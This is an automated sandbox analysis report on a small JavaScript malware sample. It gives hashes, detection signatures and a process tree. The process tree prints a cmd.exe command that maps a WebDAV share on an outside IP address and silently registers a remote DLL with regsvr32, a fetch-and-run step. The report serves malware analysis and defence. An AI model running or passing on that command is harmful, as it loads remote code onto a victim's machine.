Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
23-07-2024 04:24
Static task
static1
Behavioral task
behavioral1
Sample
23312213452009432234.js
Resource
win7-20240705-en
windows7-x64
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
23312213452009432234.js
Resource
win10v2004-20240709-en
windows10-2004-x64
5 signatures
150 seconds
General
-
Target
23312213452009432234.js
-
Size
3KB
-
MD5
3f1cdde0e714fc72fba22fe9a4b1de27
-
SHA1
e9e8a2e0d9f562d349bf19a673724f6bad2c1683
-
SHA256
95dce3345ff7b76bedd40f29b889dbc67f14a5ac8c692bb1a4ca0a485b94f9fb
-
SHA512
a5d9a32b8a865602a461a391a7aebf3c7df37c0cff981766f83f5ca4dba57db60a31cf830899d8b7f3a7042a14c54a9e57c5055d29374af5911c03f6d3420f3f
Score
3/10
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1440 wrote to memory of 1120 1440 wscript.exe 31 PID 1440 wrote to memory of 1120 1440 wscript.exe 31 PID 1440 wrote to memory of 1120 1440 wscript.exe 31 PID 1120 wrote to memory of 2340 1120 cmd.exe 33 PID 1120 wrote to memory of 2340 1120 cmd.exe 33 PID 1120 wrote to memory of 2340 1120 cmd.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\23312213452009432234.js1⤵
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\15482190676437.dll2⤵
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:2340
-
-